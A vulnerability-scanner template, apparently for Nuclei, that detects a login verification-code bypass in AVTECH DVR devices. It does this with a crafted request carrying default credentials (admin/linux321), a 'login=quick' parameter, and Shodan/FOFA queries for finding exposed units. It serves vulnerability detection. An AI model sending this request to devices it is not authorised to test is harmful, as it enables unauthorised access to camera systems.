id: avtech-verification-bypass

info:
  name: AVTECH DVR - Login Verification Code Bypass
  author: ritikchaddha
  severity: low
  description: |
    AVTECH DVR products are  vulnerable to verification code bypass just by entering the "login=quick" parameter to bypass verification code.
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"login" product:"Avtech"
    fofa-query: app="AVTECH-视频监控"
  tags: avtech,verify,bypass,iot

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/nobody/VerifyCode.cgi?account={{base64(username + ':' + password)}}&login=quick"

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - linux321

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "^0.*\nOK.*"

      - type: dsl
        dsl:
          - status_code == 200
          - len(body) == 5
        condition: and

# digest: 4b0a00483046022100f66dfc80ac1a45755069a731adee572ccf8c2a212a01cf620d518d45127b16f20221009c4b0ba05a989d4e3436f50fedca757ba584308e5fb2a9d4dcf7f810a6111861:922c64590222798bb761d5b6d8e72950